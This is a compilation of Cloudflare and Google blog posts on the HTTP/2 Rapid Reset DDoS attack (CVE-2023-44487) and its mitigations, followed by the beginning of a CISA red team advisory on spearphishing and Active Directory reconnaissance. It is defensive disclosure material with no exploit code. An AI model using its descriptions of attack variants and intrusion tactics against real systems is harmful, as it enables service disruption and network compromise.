HTTP/2 Rapid Reset: deconstructing the record-breaking attack

10/10/2023

Lucas Pardue
Julien Desgats

Starting on Aug 25, 2023, we started to notice some unusually big HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long however, before they started to reach record breaking sizes — and eventually peaked just above 201 million requests per second. This was nearly 3x bigger than our previous biggest attack on record.Under attack or need additional protection? Click here to get help.

Concerning is the fact that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it’s not inconceivable that using this method could focus an entire web’s worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare’s existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see  CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This included every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a “wire format” for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

And the response would look like:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLFCRLF<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required; meaning that messages are exchanged serially and can not be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLFGET /page/2/ HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

With the responses:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLFCRLF<100 bytes of data>CRLFHTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLFCRLF<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resources fetching especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag, that when set to the value 1 (true), can trigger a state transition.

Let’s work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATEPRIORITY or RST_STREAM frames. It can receive any frame however.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the “open” state or in either of the “half-closed” states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness— which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.

Let’s consider our previous example of 3 requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response and instead only responds to stream 3 and 5:

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled, rapidly transitions through the stream lifecycle. The client’s HEADERS with END_STREAM flag set to 1 transitions the state from idle to open to half-closed, then RST_STREAM immediately causes a transition from half-closed to closed.

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare’s reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server’s chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here’s an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I’ve used an off-the-shelf server without any mitigations; listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

It’s a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark’s Statistics > HTTP2 tool:

The first frame in this trace, in packet 14, is the server’s SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

Interestingly, the RST_STREAM for stream 1051 doesn’t fit in packet 15, so in packet 16 we see the server respond with a 404 response.  Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client sent a lot more HEADERS frames than that. The client did not have to wait for any return traffic from the server, it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on it. This was the case with this attack, where most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let’s dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP 1, 2 or 3 traffic, then forwards it to our “business logic” proxy. This one is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy cannot connect anymore to its upstream proxy, this is why some clients saw a bare “502 Bad Gateway” error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence of that is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks at around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two hours while this was happening:

We worked to reduce this number dramatically in the following days, as detailed later on in this post. Both thanks to changes in our stack and to our mitigation that reduce the size of these attacks considerably, this number today is effectively zero.

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in a HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of receiving an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for a server’s SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so don’t tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they pick wrong the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, with the hope that servers followed the specification recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.

There are many reasons a server might reset a stream beyond concurrency limit overstepping. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious and closing the connection addresses both cases.

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don’t wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response.  CVE-2023-44487 is a different manifestation of HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses for RST_STREAM are unaffected.

In addition to a direct fix, we have implemented several improvements to the server’s HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns as well as giving more room to the server to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named “IP Jail”. For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is “jailed”, not only it is blocked from connecting to the attacked property, we also forbid the corresponding IPs from using HTTP/2 to any other domain on Cloudflare for some time. As such protocol abuses are not possible using HTTP/1.x, this limits the attacker’s ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP based mitigations are a very blunt tool — this is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short so any long term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

Another front on which we are making change is observability. Returning errors to clients without being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

How it works: The novel HTTP/2 ‘Rapid Reset’ DDoS attack

October 10, 2023

Juho Snellman
Staff Software Engineer

Daniele Iamartino
Staff Site Reliability Engineer

A number of Google services and Cloud customers have been targeted with a novel HTTP/2-based DDoS attack which peaked in August. These attacks were significantly larger than any previously-reported Layer 7 attacks, with the largest attack surpassing 398 million requests per second.

The attacks were largely stopped at the edge of our network by Google’s global load balancing infrastructure and did not lead to any outages. While the impact was minimal, Google’s DDoS Response Team reviewed the attacks and added additional protections to further mitigate similar attacks. In addition to Google’s internal response, we helped lead a coordinated disclosure process with industry partners to address the new HTTP/2 vector across the ecosystem.

Hear monthly from our Cloud CISO in your inbox

Get security updates, musings, and more from Google Cloud CISO Phil Venables direct to your inbox every month.

Subscribe today

https://storage.googleapis.com/gweb-cloudblog-publish/images/gcat_small_1.max-300x168.jpg

Below, we explain the predominant methodology for Layer 7 attacks over the last few years, what changed in these new attacks to make them so much larger, and the mitigation strategies we believe are effective against this attack type. This article is written from the perspective of a reverse proxy architecture, where the HTTP request is terminated by a reverse proxy that forwards requests to other services. The same concepts apply to HTTP servers that are integrated into the application server, but with slightly different considerations which potentially lead to different mitigation strategies.

A primer on HTTP/2 for DDoS

Since late 2021, the majority of Layer 7 DDoS attacks we’ve observed across Google first-party services and Google Cloud projects protected by Cloud Armor have been based on HTTP/2, both by number of attacks and by peak request rates.

A primary design goal of HTTP/2 was efficiency, and unfortunately the features that make HTTP/2 more efficient for legitimate clients can also be used to make DDoS attacks more efficient.

Stream multiplexing

HTTP/2 uses “streams”, bidirectional abstractions used to transmit various messages, or “frames”, between the endpoints. “Stream multiplexing” is the core HTTP/2 feature which allows higher utilization of each TCP connection. Streams are multiplexed in a way that can be tracked by both sides of the connection while only using one Layer 4 connection. Stream multiplexing enables clients to have multiple in-flight requests without managing multiple individual connections.

One of the main constraints when mounting a Layer 7 DoS attack is the number of concurrent transport connections. Each connection carries a cost, including operating system memory for socket records and buffers, CPU time for the TLS handshake, as well as each connection needing a unique four-tuple, the IP address and port pair for each side of the connection, constraining the number of concurrent connections between two IP addresses.

In HTTP/1.1, each request is processed serially. The server will read a request, process it, write a response, and only then read and process the next request. In practice, this means that the rate of requests that can be sent over a single connection is one request per round trip, where a round trip includes the network latency, proxy processing time and backend request processing time. While HTTP/1.1 pipelining is available in some clients and servers to increase a connection’s throughput, it is not prevalent amongst legitimate clients.

With HTTP/2, the client can open multiple concurrent streams on a single TCP connection, each stream corresponding to one HTTP request. The maximum number of concurrent open streams is, in theory, controllable by the server, but in practice clients may open 100 streams per request and the servers process these requests in parallel. It’s important to note that server limits can not be unilaterally adjusted.

For example, the client can open 100 streams and send a request on each of them in a single round trip; the proxy will read and process each stream serially, but the requests to the backend servers can again be parallelized. The client can then open new streams as it receives responses to the previous ones. This gives an effective throughput for a single connection of 100 requests per round trip, with similar round trip timing constants to HTTP/1.1 requests. This will typically lead to almost 100 times higher utilization of each connection.

The HTTP/2 Rapid Reset attack

The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.

This attack is called Rapid Reset because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open.

https://storage.googleapis.com/gweb-cloudblog-publish/images/2023_worlds_largest_rapid_reset_diagram.max-1616x909.png

HTTP/1.1 and HTTP/2 request and response pattern

The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.

The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.

In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.

Another advantage the attacker gains is that the explicit cancellation of requests immediately after creation means that a reverse proxy server won’t send a response to any of the requests. Canceling the requests before a response is written reduces downlink (server/proxy to attacker) bandwidth.

HTTP/2 Rapid Reset attack variants

In the weeks after the initial DDoS attacks, we have seen some Rapid Reset attack variants. These variants are generally not as efficient as the initial version was, but might still be more efficient than standard HTTP/2 DDoS attacks.

The first variant does not immediately cancel the streams, but instead opens a batch of streams at once, waits for some time, and then cancels those streams and then immediately opens another large batch of new streams. This attack may bypass mitigations that are based on just the rate of inbound RST_STREAM frames (such as allow at most 100 RST_STREAMs per second on a connection before closing it).

These attacks lose the main advantage of the canceling attacks by not maximizing connection utilization, but still have some implementation efficiencies over standard HTTP/2 DDoS attacks. But this variant does mean that any mitigation based on rate-limiting stream cancellations should set fairly strict limits to be effective.

The second variant does away with canceling streams entirely, and instead optimistically tries to open more concurrent streams than the server advertised. The benefit of this approach over the standard HTTP/2 DDoS attack is that the client can keep the request pipeline full at all times, and eliminate client-proxy RTT as a bottleneck. It can also eliminate the proxy-server RTT as a bottleneck if the request is to a resource that the HTTP/2 server responds to immediately.

RFC 9113, the current HTTP/2 RFC, suggests that an attempt to open too many streams should invalidate only the streams that exceeded the limit, not the entire connection. We believe that most HTTP/2 servers will not process those streams, and is what enables the non-cancelling attack variant by almost immediately accepting and processing a new stream after responding to a previous stream.

A multifaceted approach to mitigations

We don’t expect that simply blocking individual requests is a viable mitigation against this class of attacks — instead the entire TCP connection needs to be closed when abuse is detected. HTTP/2 provides built-in support for closing connections, using the GOAWAY frame type. The RFC defines a process for gracefully closing a connection that involves first sending an informational GOAWAY that does not set a limit on opening new streams, and one round trip later sending another that forbids opening additional streams.

However, this graceful GOAWAY process is usually not implemented in a way which is robust against malicious clients. This form of mitigation leaves the connection vulnerable to Rapid Reset attacks for too long, and should not be used for building mitigations as it does not stop the inbound requests. Instead, the GOAWAY should be set up to limit stream creation immediately.

This leaves the question of deciding which connections are abusive. The client canceling requests is not inherently abusive, the feature exists in the HTTP/2 protocol to help better manage request processing. Typical situations are when a browser no longer needs a resource it had requested due to the user navigating away from the page, or applications using a long polling approach with a client-side timeout.

Mitigations for this attack vector can take multiple forms, but mostly center around tracking connection statistics and using various signals and business logic to determine how useful each connection is. For example, if a connection has more than 100 requests with more than 50% of the given requests canceled, it could be a candidate for a mitigation response. The magnitude and type of response depends on the risk to each platform, but responses can range from forceful GOAWAY frames as discussed before to closing the TCP connection immediately.

To mitigate against the non-cancelling variant of this attack, we recommend that HTTP/2 servers should close connections that exceed the concurrent stream limit. This can be either immediately or after some small number of repeat offenses.

Applicability to other protocols

We do not believe these attack methods translate directly to HTTP/3 (QUIC) due to protocol differences, and Google does not currently see HTTP/3 used as a DDoS attack vector at scale. Despite that, our recommendation is for HTTP/3 server implementations to proactively implement mechanisms to limit the amount of work done by a single transport connection, similar to the HTTP/2 mitigations discussed above.

Industry coordination

Early in our DDoS Response Team’s investigation and in coordination with industry partners, it was apparent that this new attack type could have a broad impact on any entity offering the HTTP/2 protocol for their services. Google helped lead a coordinated vulnerability disclosure process taking advantage of a pre-existing coordinated vulnerability disclosure group, which has been used for a number of other efforts in the past.

During the disclosure process, the team focused on notifying large-scale implementers of HTTP/2 including infrastructure companies and server software providers. The goal of these prior notifications was to develop and prepare mitigations for a coordinated release. In the past, this approach has enabled widespread protections to be enabled for service providers or available via software updates for many packages and solutions.

During the coordinated disclosure process, we reserved CVE-2023-44487 to track fixes to the various HTTP/2 implementations.

Next steps

The novel attacks discussed in this post can have significant impact on services of any scale. All providers who have HTTP/2 services should assess their exposure to this issue. Software patches and updates for common web servers and programming languages may be available to apply now or in the near future. We recommend applying those fixes as soon as possible.

For our customers, we recommend patching software and enabling the Application Load Balancer and Google Cloud Armor, which has been protecting Google and existing Google Cloud Application Load Balancing users.

Source :
https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks

Release Date February 28, 2023
Alert CodeAA23-059A

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISAis releasing this Cybersecurity Advisory (CSAdetailing activity and key findings from a recent CISA red team assessmentin coordination with the assessed organizationto provide network defenders recommendations for improving their organization’s cyber posture.

Actions to take today to harden your local environment:

  • Establish a security baseline of normal network activity; tune network and host-based appliances to detect anomalous behavior.
  • Conduct regular assessments to ensure appropriate procedures are created and can be followed by security staff and end users.
  • Enforce phishing-resistant MFA to the greatest extent possible.

In 2022, CISA conducted a red team assessment (RTA) at the request of a large critical infrastructure organization with multiple geographically separated sites. The team gained persistent access to the organization’s network, moved laterally across the organization’s multiple geographically separated sites, and eventually gained access to systems adjacent to the organization’s sensitive business systems (SBSs). Multifactor authentication (MFA) prompts prevented the team from achieving access to one SBS, and the team was unable to complete its viable plan to compromise a second SBSs within the assessment period.

Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response.

CISA is releasing this CSA detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors. This CSA highlights the importance of collecting and monitoring logs for unusual activity as well as continuous testing and exercises to ensure your organization’s environment is not vulnerable to compromise, regardless of the maturity of its cyber posture.

CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA—including conduct regular testing within their security operations center—to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.

Download the PDF version of this report:

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks(PDF, 1.06 MB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the appendix for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.

Introduction

CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6].) After receiving a request for a red team assessment (RTA) from an organization and coordinating some high-level details of the engagement with certain personnel at the organization, CISA conducted the RTA over a three-month period in 2022.

During RTAs, a CISA red team emulates cyber threat actors to assess an organization’s cyber detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network while avoiding detection and evading defenses. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, or technology.

The “victim” for this assessment was a large organization with multiple geographically separated sites throughout the United States. For this assessment, the red team’s goal during Phase I was to gain access to certain sensitive business systems (SBSs).

Phase I: Red Team Cyber Threat Activity
Overview

The organization’s network was segmented with both logical and geographical boundaries. CISA’s red team gained initial access to two organization workstations at separate sites via spearphishing emails. After gaining access and leveraging Active Directory (AD) data, the team gained persistent access to a third host via spearphishing emails. From that host, the team moved laterally to a misconfigured server, from which they compromised the domain controller (DC). They then used forged credentials to move to multiple hosts across different sites in the environment and eventually gained root access to all workstations connected to the organization’s mobile device management (MDM) server. The team used this root access to move laterally to SBS-connected workstations. However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS.

Initial Access and Active Directory Discovery

The CISA red team gained initial access [TA0001] to two workstations at geographically separated sites (Site 1 and Site 2) via spearphishing emails. The team first conducted open-source research [TA0043] to identify potential targets for spearphishing. Specifically, the team looked for email addresses [T1589.002] as well as names [T1589.003] that could be used to derive email addresses based on the team’s identification of the email naming scheme. The red team sent tailored spearphishing emails to seven targets using commercially available email platforms [T1585.002]. The team used the logging and tracking features of one of the platforms to analyze the organization’s email filtering defenses and confirm the emails had reached the target’s inbox.

The team built a rapport with some targeted individuals through emails, eventually leading these individuals to accept a virtual meeting invite. The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204]. After the download, another button appeared, which, when clicked, executed the file.

Two of the seven targets responded to the phishing attempt, giving the red team access to a workstation at Site 1 (Workstation 1) and a workstation at Site 2. On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch, and command-line tool, dsquery, to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OU), and group policy objects (GPOs) [T1615]. Note: SharpHound is a BloodHound collector, an open-source AD reconnaissance tool. Bloodhound has multiple collectors that assist with information querying.

There were 52 hosts in the AD that had Unconstrained Delegation enabled and a lastlogon timestamp within 30 days of the query. Hosts with Unconstrained Delegation enabled store Kerberos ticket-granting tickets (TGTs) of all users that have authenticated to that host. Many of these hosts, including a Site 1 SharePoint server, were Windows Server 2012R2. The default configuration of Windows Server 2012R2 allows unprivileged users to query group membership of local administrator groups.

The red team queried parsed Bloodhound data for members of the SharePoint admin group and identified several standard user accounts with administrative access. The team initiated a second spearphishing campaign, similar to the first, to target these users. One user triggered the red team’s payload, which led to installation of a persistent beacon on the user’s workstation (Workstation 2), giving the team persistent access to Workstation 2.

Lateral Movement, Credential Access, and Persistence

